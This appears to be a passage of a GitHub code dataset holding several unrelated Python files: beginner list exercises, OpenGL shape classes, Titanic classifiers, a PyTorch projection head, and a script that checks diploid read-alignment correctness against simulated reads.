'hd':\r\n            pyautogui.keyDown('z')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('z')\r\n            pyautogui.keyDown('d')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('d')\r\n        if verdict == 'hm':\r\n            pyautogui.keyDown('z')\r\n            time.sleep(0.75)\r\n            pyautogui.keyUp('z')\r\n        # do the same for the others.\r\n\r\n    except IndexError:\r\n        ()\r\n    if cv2.waitKey(1) == 27:\r\n        
break\r\n","repo_name":"ArnaudMi/MALIS_EyeTracking","sub_path":"MALIS/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26210882511","text":"# List Exercises\r\n\r\n'''\r\nReverse a given list in python\r\n'''\r\ninfo = ['karl', '100', 'Red', 'Mangoes']\r\ninfo.reverse()\r\nprint(info)\r\n\r\n\r\n'''\r\nWrite a program to add two lists index-wise.\r\nCreate a new list that contains the 0th index item from both the list,\r\nthen the 1st index item, and so on till the last element.\r\nany leftover items will get added at the end of the new list.\r\n'''\r\nlist1 = [\"M\", \"na\", \"i\", \"Ke\"]\r\nlist2 = [\"y\", \"me\", \"s\", \"lly\"]\r\nlist3 = [list1[i]+list2[i] for i in range(min(len(list1),len(list2)))]\r\nprint(list3)\r\n\r\n'''\r\nHint: use list comprehension with zip function\r\n'''\r\nlist1 = [\"M\", \"na\", \"i\", \"Ke\"]\r\nlist2 = [\"y\", \"me\", \"s\", \"lly\"]\r\nlist3 = [i+j for (i,j) in zip(list1, list2)]\r\nprint(list3)\r\nprint(' '.join(list3))\r\n\r\n\r\n\r\n'''\r\nWrite a Python program to find the second largest number in the given list.\r\n'''\r\nlist1 = [10, 20, 4]\r\nlist1.sort()\r\nprint(list1[-2])\r\n\r\n\r\n\r\n'''\r\nConcatenate two list\r\nHint: use list comprehension\r\n<<new_list>> = [expression for item in list1 for y in list2]\r\n'''\r\n\r\nlist1 = [\"Hello \", \"take \"]\r\nlist2 = [\"Dear\", \"Sir\"]\r\nresult = [x+y for x in list1 for y in list2]\r\nprint(result)\r\n\r\n\r\n'''\r\nWrite a program to find value 20 in the list,\r\nand if it is present, replace it with 200.\r\nOnly update the first occurrence of an item.\r\n'''\r\n\r\nlist1 = [5, 10, 15, 20, 25, 50, 20]\r\nres = [200 if i==20 else i for i in list1]\r\nprint(res)\r\n\r\n\r\n'''\r\ncount number of occurrences of x in the given list\r\n'''\r\n\r\nlst = [15, 6, 7, 10, 12, 20, 10, 28, 10]\r\nx = 10\r\nprint(lst.count(x))\r\n\r\n'''\r\nwrite a program to remove all occurrences of item 20\r\nHint: list comprehension\r\n'''\r\nlist1 = [5, 20, 15, 20, 25, 50, 20]\r\nlist1 = [i for i in list1 if i!=20]\r\nprint(list1)\r\n\r\n\r\n'''\r\nWrite a program to return the middle value of a list.\r\nIf there are 2 middle values, return the second\r\n'''\r\nage = [10, 3, 45, 67, 89.0, 45]\r\nres = age[len(age)//2]\r\nprint(res)","repo_name":"riseoptions/assignment1","sub_path":"RA_List_Exercise.py","file_name":"RA_List_Exercise.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37421640494","text":"from OpenGL.GL import *\n\n\nclass Objects2D: # base class for 2D-objects\n def __init__(self, xPos, yPos, color):\n self.xPos = xPos # store center x-position\n self.yPos = yPos # store center y-position\n self.R, self.G, self.B = color # unfold color tuple\n self.alpha = 1 # set transparency to none\n self._edges = list() # create list for edges\n self._vertices = list() # create list for vertices\n\n def update(self): # update drawing of 2D-object\n glBegin(GL_LINES) # draw lines, only\n for edge in self._edges: # iterate all edges\n for vertex in edge: # iterate all vertices to draw\n glColor4f(self.R, self.G, self.B, self.alpha) # red,green,blue,alpha\n glVertex3fv(self._vertices[vertex])\n glEnd() # End of definition\n\n\nclass Square(Objects2D): # subclass to define 2D-squares\n def __init__(self, xPos = 0, yPos = 0, color = (1, 1, 1), size = 1):\n Objects2D.__init__(self, 
xPos, yPos, color) # call base class constructor\n self.__size = size # store size (for later use!?)\n dx = dy = size / 2 # to set square to the center\n self._vertices = [(xPos - dx, yPos - dy, 0), (xPos + dx, yPos - dy, 0),\n (xPos + dx, yPos + dy, 0), (xPos - dx, yPos + dy, 0)]\n self._edges = [(0, 1), (1, 2), (2, 3), (3, 0)]","repo_name":"Meschr/PythonAufgaben","sub_path":"Uebung5/Objects2D.py","file_name":"Objects2D.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18722143154","text":"from sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.externals import joblib\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD\n\ndef linearRegression(X, Y):\n alg = LinearRegression();\n alg.fit(X, Y)\n joblib.dump(alg, 'model/linear_regression.pkl')\ndef logisticRegression(X, Y):\n alg = LogisticRegression(random_state=1)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/logistic_regression.pkl')\ndef gradientboostingClassifier(X, Y):\n alg = GradientBoostingClassifier(random_state=1, n_estimators=25, max_depth=3)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/gradient_boosting_classifier.pkl')\ndef svmClassifier(X, Y):\n alg = svm.SVC()\n alg.fit(X, Y)\n joblib.dump(alg, 'model/svm_classifier.pkl')\ndef randomforestClassifier(X, Y):\n alg = RandomForestClassifier(n_estimators=10)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/random_forest_classifier.pkl')\ndef neuralNetwork(X, Y):\n model = Sequential()\n model.add(Dense(891, input_dim=9, init='uniform', activation='relu'))\n #model.add(Dropout(0.5))\n model.add(Dense(9, init='uniform', activation='relu'))\n #model.add(Dropout(0.5))\n model.add(Dense(1, init='uniform', activation='sigmoid'))\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n X_train = X.as_matrix()\n Y_train = Y.as_matrix()\n model.fit(X_train, Y_train, nb_epoch=70, batch_size=10)\n model.save('model/neural_networks.h5')\n","repo_name":"rajeshwarg/kaggle-competitions","sub_path":"Titanic/assignment/scripts/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19851165744","text":"import torch\nimport torch.nn as nn\nimport copy\n\n\nclass Phead_with_pseudo(nn.Module):\n def __init__(self, net, dim_in=2048,hidden_mlp=2048, pred_dim=512, pseudo=3000):\n super().__init__()\n # self.net = nn.Sequential(*list(net.children())[:-1])\n self.net = net\n self.projection_head = nn.Sequential(\n nn.Linear(dim_in, hidden_mlp,bias=False),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, hidden_mlp,bias=False),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, pseudo),\n nn.BatchNorm1d(pseudo, affine=False)\n )\n self.pfc = nn.Sequential(\n nn.Linear(pseudo, pred_dim, bias=False),\n nn.BatchNorm1d(pred_dim),\n nn.ReLU(inplace=True), # hidden layer\n nn.Linear(pred_dim, pseudo)) # output layer\n \n\n def forward(self, x):\n feat = self.net(x)\n emb = self.projection_head(feat)\n\n py = self.pfc(emb)\n \n return emb,py\n\n\nclass Phead(nn.Module):\n def __init__(self, net, dim_in=2048, 
dim_feat=128,hidden_mlp=2048, dim_out=1000):\n super().__init__()\n self.net = net\n self.projection_head = nn.Sequential(\n nn.Linear(dim_in, hidden_mlp),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, dim_feat),\n )\n\n\n self.fc = nn.Linear(dim_feat, dim_out)\n\n\n def forward(self, x):\n feat = self.net(x)\n emb = self.projection_head(feat)\n y = self.fc(emb)\n return y","repo_name":"Zoe-Wan/clusterSSL","sub_path":"src/Phead.py","file_name":"Phead.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18668205905","text":"'''\nCompares a diploid-to-diploid sam and \nchecks if the multi-mapped regions are \nidentical in two personalized refs\n'''\nimport argparse, math, sys, os\nimport pandas as pd\n# from analyze_sam import SamInfo, parse_line, load_golden_dic, Summary\nfrom lib_compare_sam import SamInfo, parse_line, load_golden_dic, Summary, print_df_stats\nfrom build_erg import read_var, read_genome\nimport constants\n\n#: TODO LEV should support different scoring schemes\nfrom get_levenshtein import levenshtein\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-n', '--sam',\n help='target sam file'\n )\n parser.add_argument(\n '-g', '--golden',\n help='golden sam file'\n )\n parser.add_argument(\n '-vr', '--var_reads',\n help='the file specifying variants for the synthetic reads'\n )\n parser.add_argument(\n '-vs', '--var_sample',\n help='the file specifying variants for the current target reference'\n )\n parser.add_argument(\n '-p', '--personalized', type=int,\n default=0,\n help='(int) specify whether the ref seq(s) are standard (0) or personalized-diploid (2) sample [0]'\n )\n parser.add_argument(\n '-c', '--chrom',\n help='(str) chromosome [None]'\n )\n parser.add_argument(\n '-t', '--threshold', type=int,\n default=10,\n help='(int) max allowed distance for a correct mapping [10]'\n )\n parser.add_argument(\n '--read_len', type=int,\n default=100,\n help='(int) read length [100]'\n )\n parser.add_argument(\n '--step_size', type=int,\n default=1000,\n help='(int) the step size for main/alt offset indexes [1000]'\n )\n parser.add_argument(\n '--write_wrt_correctness',\n action='store_true',\n #default=None,\n help='(int) If set, writes two files recording correct/incorrect alignments respectively. 
The output files use target sam prefix [None].'\n )\n parser.add_argument(\n '--debug_ref',\n help='reference fasta for debug purpose [None]'\n )\n parser.add_argument(\n '--debug_hapA',\n help='hapA fasta for debug purpose [None]'\n )\n parser.add_argument(\n '--debug_hapB',\n help='hapB fasta for debug purpose [None]'\n )\n args = parser.parse_args()\n return args\n\ndef build_index(var_list):\n '''\n Reads var_list and maps variants from hapA/B to the reference coordinate\n \n SHOW_MULT:\n A MULT here can be an ALT locus, such as \n A 9 INDEL 10362 10362 C CT\n B 9 INDEL 10362 10362 C CT\n or a multi-allelic locus, such as\n A 9 SNP 121398204 121393883 A C\n B 9 SNP 121398204 121393566 A T\n '''\n SHOW_MULT = False\n main_index = {}\n alt_index = {}\n for v in var_list:\n pos = v.alt_pos\n c_pos = v.ref_pos + v.cor_offset\n if v.strand == constants.MAIN_STRAND:\n if SHOW_MULT:\n if main_index.get(pos):\n print (pos, main_index[pos])\n print (v.line)\n if alt_index.get(c_pos):\n print (c_pos, alt_index[c_pos])\n print (v.line)\n for i in range(pos, pos + len(v.alt_allele)):\n main_index[i] = [v.ref_pos, v.vtype, v.ref_allele, v.alt_allele]\n else:\n if SHOW_MULT:\n if main_index.get(c_pos):\n print (c_pos, main_index[c_pos])\n print (v.line)\n if alt_index.get(pos):\n print (pos, alt_index[pos])\n print (v.line)\n for i in range(pos, pos + len(v.alt_allele)):\n alt_index[i] = [v.ref_pos, v.vtype, v.ref_allele, v.alt_allele]\n return main_index, alt_index\n\ndef build_offset_index(var_list):\n # , step, MAIN_STRAND, ALT_STRAND):\n '''\n CURRENTLY UNUSED\n \n MAIN/ALT-offset indexes are dictionaries with\n key: pos on MAIN/ALT\n value: pos on ALT/MAIN\n \n MAIN/ALT indexes are dictionaries storing\n variants based on MAIN/ALT coordinates\n '''\n #: dict storing the diff from main to alt\n #: main_pos + main_offset_index[i] = alt_pos\n main_offset_index = [0]\n #: dict storing the diff from alt to main\n #: alt_pos + alt_offset_index[i] = main_pos\n alt_offset_index = [0]\n SHOW_DUP_WARN = False\n tmp_v = 0\n for v in var_list:\n if v.strand == constants.MAIN_STRAND:\n main_pos = v.alt_pos\n alt_pos = v.ref_pos + v.cor_offset\n main_offset = -v.offset + v.cor_offset\n alt_offset = v.offset - v.cor_offset\n if v.ref_pos == tmp_v:\n if SHOW_DUP_WARN:\n print ('Warning: duplicated variant', v.line)\n tmp_v = v.ref_pos\n elif v.strand == constants.ALT_STRAND:\n main_pos = v.ref_pos + v.cor_offset\n alt_pos = v.alt_pos\n main_offset = v.offset - v.cor_offset\n alt_offset = -v.offset + v.cor_offset\n else:\n print ('Error: unspecified strand', v.strand)\n exit()\n \n i_main = math.ceil(main_pos / constants.STEP)\n while i_main >= len(main_offset_index):\n main_offset_index.append(main_offset_index[len(main_offset_index) - 1])\n main_offset_index[i_main] = main_offset\n i_alt = math.ceil(alt_pos / constants.STEP)\n while i_alt >= len(alt_offset_index):\n alt_offset_index.append(alt_offset_index[len(alt_offset_index) - 1])\n alt_offset_index[i_alt] = alt_offset\n \n return main_offset_index, alt_offset_index\n\ndef build_offset_index_ref(var_list):\n '''\n ALT1/ALT2-offset indexes are dictionaries with\n key: pos on ALT1/ALT2\n value: offset on ALT1/ALT2 reference sequence at 'key'\n\n Outputs:\n alt1_offset_index:\n dict storing the diff from alt1 to ref\n alt1_pos - alt1_offset_index[i] = ref_pos\n alt2_offset_index:\n dict storing the diff from alt2 to ref\n alt2_pos - alt2_offset_index[i] = ref_pos\n '''\n alt1_offset_index = [0]\n alt2_offset_index = [0]\n for v in var_list:\n #: offset: ref 
to hap\n offset = v.offset\n idx = math.ceil(v.alt_pos / constants.STEP)\n if v.strand == constants.MAIN_STRAND:\n while idx >= len(alt1_offset_index):\n alt1_offset_index.append(alt1_offset_index[len(alt1_offset_index) - 1])\n alt1_offset_index[idx] = offset\n elif v.strand == constants.ALT_STRAND:\n while idx >= len(alt2_offset_index):\n alt2_offset_index.append(alt2_offset_index[len(alt2_offset_index) - 1])\n alt2_offset_index[idx] = offset\n else:\n print ('Error: unspecified strand', v.strand)\n exit()\n \n return alt1_offset_index, alt2_offset_index\n\n# TODO\ndef print_aln_within_distance(name, reads_offsets, sample_offsets, info, g_info, threshold, read_len, COMPARE_SEQ):\n '''\n Compares alignment with the golden profile if they are near.\n If COMPARE_SEQ is specified, retrieves sequences from ref and haps and calculate the distance.\n '''\n if COMPARE_SEQ == False:\n return\n tmp = []\n for i in reads_offsets:\n tmp.append(abs(info.pos + i - g_info.pos))\n diff = min(tmp)\n if (diff < threshold) or (threshold < 0):\n global TOTALNEAR\n TOTALNEAR += 1\n seq_ref = REF_G[info.pos: info.pos + read_len]\n seq_hapA = HAPA_G[g_info.pos: g_info.pos + read_len]\n seq_hapB = HAPB_G[g_info.pos: g_info.pos + read_len]\n leven_score_g = []\n for i in reads_offsets:\n seq_ref_g = REF_G[g_info.pos - i: g_info.pos - i + read_len]\n leven_score_g.append(levenshtein(seq_ref_g, seq_hapA))\n leven_score_g.append(levenshtein(seq_ref_g, seq_hapB))\n called_d = min(levenshtein(seq_ref, seq_hapA), levenshtein(seq_ref, seq_hapB))\n golden_d = min(leven_score_g)\n global HIGHC, CALL_D_ALT, SIM_D_ALT, CALL_D_ORIG, SIM_D_ORIG\n if called_d >= golden_d:\n CALL_D_ORIG.append(called_d)\n SIM_D_ORIG.append(golden_d)\n else:\n HIGHC += 1\n CALL_D_ALT.append(called_d)\n SIM_D_ALT.append(golden_d)\n if called_d > 5 or golden_d > 5 and __debug__:\n print ('called distance', called_d)\n print ('golden distance', golden_d)\n print ('CALLED (%10d) = %s' % (info.pos, REF_G[info.pos : info.pos + 80]))\n print ('ORIG1 (%10d) = %s' % (g_info.pos - reads_offsets[0], REF_G[g_info.pos - reads_offsets[0] : g_info.pos - reads_offsets[0] + 80]))\n if reads_offsets[0] != reads_offsets[1]:\n print ('ORIG2 (%10d) = %s' % (g_info.pos - reads_offsets[1], REF_G[g_info.pos - reads_offsets[1] : g_info.pos - reads_offsets[1] + 80]))\n print ('PERSON (#%9d) = %s' % (g_info.pos, HAPA_G[g_info.pos : g_info.pos + 80]))\n return\n\ndef compare_sam_info(\n info,\n ginfo,\n threshold,\n sample_offsets=[0],\n reads_offsets=[0],\n ignore_chrom=False\n ):\n '''\n Inputs:\n info:\n info from alignment\n ginfo:\n info from simulation profile (golden)\n offset:\n positiontal offset\n ignore_chrom:\n set True to ignore alignment against different chromosomes\n \n Output:\n an INT representing alignment correctness\n if < 0:\n -1: unmatched chromosome\n -2: unmatched direction\n if >= 0:\n the difference in alignment position\n 0 is a perfect match\n '''\n if (ignore_chrom is False) and (info.chrom != ginfo.chrom):\n #: diff chromosome\n if __debug__:\n print (\"False: chr, mapq =\", info.mapq)\n return -1\n if (info.is_rc() ^ ginfo.is_rc()) is True:\n #: diff direction\n if __debug__: \n print (\"False: direction (%s, %s)\" % (info.is_rc(), ginfo.is_rc()), \"mapq =\", info.mapq)\n return -2\n dist = []\n for soff in sample_offsets:\n for roff in reads_offsets:\n dist.append(abs(info.pos - soff - ginfo.pos + roff))\n return min(dist)\n\ndef diploid_compare(\n info, \n g_info,\n name, \n threshold, \n dip_flag, \n COMPARE_SEQ,\n reads_main_offset_index 
= {}, \n reads_alt_offset_index = {},\n sample_main_offset_index = {},\n sample_alt_offset_index = {}\n):\n '''\n Uses variable 'dip_flag' to handle different cases of a diploid alignment \n and check if the alignment is correct.\n '''\n sample_offsets = [0]\n if dip_flag in ['same_strand_ref']:\n if sample_main_offset_index != {}:\n i_low = int(info.pos / constants.STEP)\n i_high = math.ceil(info.pos / constants.STEP)\n if i_low >= len(sample_main_offset_index):\n sample_offset_low = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_low = sample_main_offset_index[i_low]\n if i_high >= len(sample_main_offset_index):\n sample_offset_high = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_high = sample_main_offset_index[i_high]\n sample_offsets = [sample_offset_low, sample_offset_high]\n elif dip_flag in ['same_id', 'same_var', 'diff_id', 'diff_var']:\n i_low = int(info.pos / constants.STEP)\n i_high = math.ceil(info.pos / constants.STEP)\n if info.chrom == constants.MAIN_CHROM:\n if i_low >= len(sample_main_offset_index):\n sample_offset_low = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_low = sample_main_offset_index[i_low]\n if i_high >= len(sample_main_offset_index):\n sample_offset_high = sample_main_offset_index[len(sample_main_offset_index) - 1]\n else:\n sample_offset_high = sample_main_offset_index[i_high]\n elif info.chrom == constants.ALT_CHROM:\n if i_low >= len(sample_alt_offset_index):\n sample_offset_low = sample_alt_offset_index[len(sample_alt_offset_index) - 1]\n else:\n sample_offset_low = sample_alt_offset_index[i_low]\n if i_high >= len(sample_alt_offset_index):\n sample_offset_high = sample_alt_offset_index[len(sample_alt_offset_index) - 1]\n else:\n sample_offset_high = sample_alt_offset_index[i_high]\n else:\n print ('Error: invalid chrom', info.chrom, constants.MAIN_CHROM, constants.ALT_CHROM)\n exit()\n sample_offsets = [sample_offset_low, sample_offset_high]\n else:\n print ('Error: undistinguished dip_flag: %s' % dip_flag)\n return False\n \n i_low = int(g_info.pos / constants.STEP)\n i_high = math.ceil(g_info.pos / constants.STEP)\n reads_offsets = []\n #: check hapA\n if name.find(constants.MAIN_HAP) > 0:\n if i_low >= len(reads_main_offset_index):\n reads_offsets.append(reads_main_offset_index[len(reads_main_offset_index) - 1])\n else:\n reads_offsets.append(reads_main_offset_index[i_low])\n if i_high >= len(reads_main_offset_index):\n reads_offsets.append(reads_main_offset_index[len(reads_main_offset_index) - 1])\n else:\n reads_offsets.append(reads_main_offset_index[i_high])\n #: check hapB\n elif name.find(constants.ALT_HAP) > 0:\n if i_low >= len(reads_alt_offset_index):\n reads_offsets.append(reads_alt_offset_index[len(reads_alt_offset_index) - 1])\n else:\n reads_offsets.append(reads_alt_offset_index[i_low])\n if i_high >= len(reads_alt_offset_index):\n reads_offsets.append(reads_alt_offset_index[len(reads_alt_offset_index) - 1])\n else:\n reads_offsets.append(reads_alt_offset_index[i_high])\n\n dist = compare_sam_info(\n info=info,\n ginfo=g_info,\n threshold=threshold,\n sample_offsets=sample_offsets,\n reads_offsets=reads_offsets,\n ignore_chrom=True\n )\n\n if (dist < 0 or dist > threshold) and COMPARE_SEQ:\n print_aln_within_distance(\n name=name,\n reads_offsets=reads_offsets,\n sample_offsets=sample_offsets,\n info=info,\n g_info=g_info,\n threshold=1000,\n read_len=read_len,\n COMPARE_SEQ=COMPARE_SEQ\n )\n\n return dist\n\ndef 
count_overlapping_vars(\n    name,\n    info,\n    g_info,\n    main_index,\n    alt_index\n):\n    '''\n    For an alignment, count the number of overlapping variants.\n    The count is based on simulated position \n    (look up golden dictionary).\n    '''\n    num_var = 0 \n    for i in range(g_info.pos, g_info.pos + constants.READ_LEN):\n        if g_info.chrom == constants.MAIN_CHROM or g_info.chrom == constants.CHROM or g_info.chrom == 'chr' + constants.MAIN_CHROM or g_info.chrom == 'chr' + constants.CHROM:\n            # if g_info.chrom == constants.MAIN_CHROM or g_info.chrom == constants.CHROM:\n            # if g_info.chrom == constants.MAIN_CHROM:\n            if main_index.get(i) is not None:\n                num_var += 1\n        elif g_info.chrom == constants.ALT_CHROM or g_info.chrom == 'chr' + constants.ALT_CHROM:\n            # elif g_info.chrom == constants.ALT_CHROM:\n            if alt_index.get(i) is not None:\n                num_var += 1\n        else:\n            print ('Error: unexpected chrom', info.chrom)\n            info.print()\n            exit()\n    return num_var\n\ndef build_all_indexes(\n    var_reads_fn,\n    var_sample_fn,\n    personalized\n):\n    '''\n    Reads two var files and builds all the indexes we use for computing correctness\n    '''\n    var_reads_list = read_var(\n        var_reads_fn,\n        remove_conflict=True,\n        remove_homo_alt=False\n    )\n    main_index, alt_index = build_index(var_reads_list)\n    reads_main_offset_index, reads_alt_offset_index = build_offset_index_ref(var_reads_list)\n    #: diploid personalized ref\n    if personalized == 2:\n        var_sample_list = read_var(\n            var_sample_fn,\n            remove_conflict=True,\n            remove_homo_alt=False\n        )\n        sample_main_offset_index, sample_alt_offset_index = build_offset_index_ref(var_sample_list)\n    #: standard ref seq\n    elif personalized == 0:\n        #: major allele reference with indels\n        if var_sample_fn is not None:\n            var_sample_list = read_var(\n                var_sample_fn,\n                remove_conflict=True,\n                remove_homo_alt=False\n            )\n            sample_main_offset_index, _ = build_offset_index_ref(var_sample_list)\n            #: no ALT offsets for a haploid major-allele reference; use an empty index\n            sample_alt_offset_index = {}\n        else:\n            sample_main_offset_index = {}\n            sample_alt_offset_index = {}\n    else:\n        print ('Error: unsupported personalized parameter', personalized)\n        exit()\n    return main_index, alt_index, reads_main_offset_index, reads_alt_offset_index, sample_main_offset_index, sample_alt_offset_index\n\ndef analyze_diploid_indels(\n    sam_fn,\n    golden_dic,\n    threshold,\n    all_indexes,\n    personalized,\n    chrom,\n    step,\n    read_len,\n    write_wrt_correctness,\n    COMPARE_SEQ\n):\n    '''\n    Handles I/O and different operating modes of this script.\n    '''\n    main_index, alt_index, reads_main_offset_index, reads_alt_offset_index, sample_main_offset_index, sample_alt_offset_index = all_indexes\n    \n    sam_f = open(sam_fn, 'r')\n    sam_prefix = sam_fn[: sam_fn.find('.')]\n    summary = Summary(has_answer=True)\n    results = []\n    \n    if write_wrt_correctness:\n        correct_fn = sam_prefix + '-correct.sam'\n        incorrect_fn = sam_prefix + '-incorrect.sam'\n        print ('Write sam files %s and %s w.r.t. correctness...' 
% (correct_fn, incorrect_fn))\n        correct_f = open(correct_fn, 'w')\n        incorrect_f = open(incorrect_fn, 'w')\n\n    for line in sam_f:\n        #name, info = parse_line(line, erg=True)\n        # single-end\n        name, info = parse_line(line, erg=True, mason2=True, score=COMPARE_SEQ)\n        # paired-end\n        # name, info = parse_line(line, erg=True, mason2=False, score=COMPARE_SEQ)\n        #: headers\n        if name == 'header':\n            continue\n        summary.add_one()\n\n        # first segment: 0\n        # second segment: 1\n        # g_info = golden_dic[name][info.is_first_seg() ^ 1]\n        g_info = golden_dic[name][info.is_first_seg()]\n\n        #: counts the number of overlapping variants for all aligned reads\n        num_var = count_overlapping_vars(\n            name=name,\n            info=info,\n            g_info=g_info,\n            main_index=main_index,\n            alt_index=alt_index\n        )\n\n        if info.is_unaligned():\n            dist = -3\n            flag = 'unaligned'\n        #: alignment against personalized genomes\n        elif personalized == 2:\n            #: aligned to incorrect haplotype\n            name_chrom_mismatch = (\n                (name.find(constants.MAIN_HAP) > 0 and info.chrom != constants.MAIN_CHROM) or \n                (name.find(constants.ALT_HAP) > 0 and info.chrom != constants.ALT_CHROM)\n            )\n            if name_chrom_mismatch:\n                if num_var == 0:\n                    flag = 'diff_id'\n                else:\n                    flag = 'diff_var'\n            else:\n                if num_var == 0:\n                    flag = 'same_id'\n                else:\n                    flag = 'same_var'\n            dist = diploid_compare(\n                info=info, \n                # g_info=golden_dic[name],\n                g_info=g_info,\n                name=name, \n                threshold=threshold, \n                dip_flag=flag, \n                reads_main_offset_index = reads_main_offset_index, \n                reads_alt_offset_index = reads_alt_offset_index,\n                sample_main_offset_index = sample_main_offset_index,\n                sample_alt_offset_index = sample_alt_offset_index,\n                COMPARE_SEQ=COMPARE_SEQ\n            )\n        #: alignment against standard ref (and ERG)\n        elif personalized == 0:\n            flag = 'same_strand_ref'\n            dist = diploid_compare(\n                info=info, \n                # g_info=golden_dic[name],\n                g_info=g_info,\n                name=name, \n                threshold=threshold, \n                dip_flag=flag, \n                reads_main_offset_index = reads_main_offset_index, \n                reads_alt_offset_index = reads_alt_offset_index,\n                sample_main_offset_index = sample_main_offset_index,\n                sample_alt_offset_index = sample_alt_offset_index,\n                COMPARE_SEQ=COMPARE_SEQ\n            )\n            if num_var == 0:\n                flag = 'same_id'\n            else:\n                flag = 'same_var'\n\n        #: converts \"dist\" to binary comparison decision \"comp\" and adds to summary\n        if dist < 0 or dist > threshold:\n            comp = False\n        else:\n            comp = True\n        summary.add_by_categories(flag=flag, comp=comp)\n        results.append([name, dist, info.mapq, num_var, flag])\n\n        if write_wrt_correctness:\n            if comp:\n                correct_f.write(line)\n            else:\n                incorrect_f.write(line)\n\n    summary.show_summary(has_answer=True)\n    sam_f.close()\n    if write_wrt_correctness:\n        #: close the split SAM files so buffered records are flushed\n        correct_f.close()\n        incorrect_f.close()\n\n    results_df = pd.DataFrame(results, columns=['name', 'dist', 'mapq', 'numvar', 'category'])\n    results_df.to_pickle(sam_fn + '-stats.pkl')\n\n    return results_df\n\nif __name__ == '__main__':\n    args = parse_args()\n    sam_fn = args.sam\n    golden_fn = args.golden\n    threshold = args.threshold\n    var_reads_fn = args.var_reads\n    var_sample_fn = args.var_sample\n    personalized = args.personalized\n    chrom = args.chrom\n    write_wrt_correctness = args.write_wrt_correctness\n    step = args.step_size\n    read_len = args.read_len\n    fn_ref = args.debug_ref\n    fn_hapA = args.debug_hapA\n    fn_hapB = args.debug_hapB\n    \n    constants.set_chrom(chrom)\n    constants.set_step(step)\n    constants.set_read_len(read_len)\n\n    #USE_PREV_IF_POSSIBLE = False\n    USE_PREV_IF_POSSIBLE = True\n    if USE_PREV_IF_POSSIBLE and os.path.isfile(sam_fn + '-stats.pkl') and write_wrt_correctness is None:\n        print ('Read stats from 
{0}-stats.pkl'.format(sam_fn))\n df = pd.read_pickle(sam_fn + '-stats.pkl')\n \n print_df_stats(df, threshold, 'all')\n exit()\n\n # global COMPARE_SEQ, \n global HIGHC, TOTALNEAR, REF_G, HAPA_G, HAPB_G, CALL_D_ALT, SIM_D_ALT, CALL_D_ORIG, SIM_D_ORIG\n if (fn_ref != None) and (fn_hapA != None) and (fn_hapB != None):\n COMPARE_SEQ = True\n HIGHC = 0\n TOTALNEAR = 0\n CALL_D_ALT = []\n SIM_D_ALT = []\n CALL_D_ORIG = []\n SIM_D_ORIG = []\n REF_G = read_genome(fn_ref)\n HAPA_G = read_genome(fn_hapA)\n HAPB_G = read_genome(fn_hapB)\n else:\n COMPARE_SEQ = False\n\n all_indexes = build_all_indexes(\n var_reads_fn=var_reads_fn,\n var_sample_fn=var_sample_fn,\n personalized=personalized\n )\n golden_dic = load_golden_dic(golden_fn)\n results_df = analyze_diploid_indels(\n sam_fn=sam_fn,\n golden_dic=golden_dic,\n threshold=threshold,\n all_indexes=all_indexes,\n personalized=personalized,\n chrom=chrom,\n step=step,\n read_len=read_len,\n write_wrt_correctness=write_wrt_correctness,\n COMPARE_SEQ=COMPARE_SEQ\n )\n\n print_df_stats(results_df, threshold, 'all')\n\n if COMPARE_SEQ:\n print ('Num of near alignments =', TOTALNEAR)\n print ('Num of alns have higher score than golden =', HIGHC)\n\n if HIGHC > 0:\n print ('Avg Lev. dist of called ALT alignments =', sum(CALL_D_ALT)/len(CALL_D_ALT))\n print ('Avg Lev. dist of simulated ALT alignments =', sum(SIM_D_ALT)/len(SIM_D_ALT))\n \n print ('Num of near alignments with higher golden score', TOTALNEAR - HIGHC)\n if TOTALNEAR - HIGHC > 0:\n print ('Avg Lev. dist of called ORIG alignments =', sum(CALL_D_ORIG)/(TOTALNEAR-HIGHC))\n print ('Avg Lev. dist of simulated ORIG alignments =', sum(SIM_D_ORIG)/(TOTALNEAR-HIGHC))\n","repo_name":"langmead-lab/reference_flow-experiments","sub_path":"scripts/analyze_diploid_indels.py","file_name":"analyze_diploid_indels.py","file_ext":"py","file_size_in_byte":24479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35453098496","text":"\"\"\"An Agenda is a list-like container of Appt (appointment).\n\n Author: FIXME for CIS 210, U. Oregon\n\n Each Appt has a date, a start time, an end time, and\n a textual description. They can be converted to and\n from strings, using the from_string class method and the __str__\n method. An Agenda can be read from a file using the\n from_file class method. Intersecting Agendas 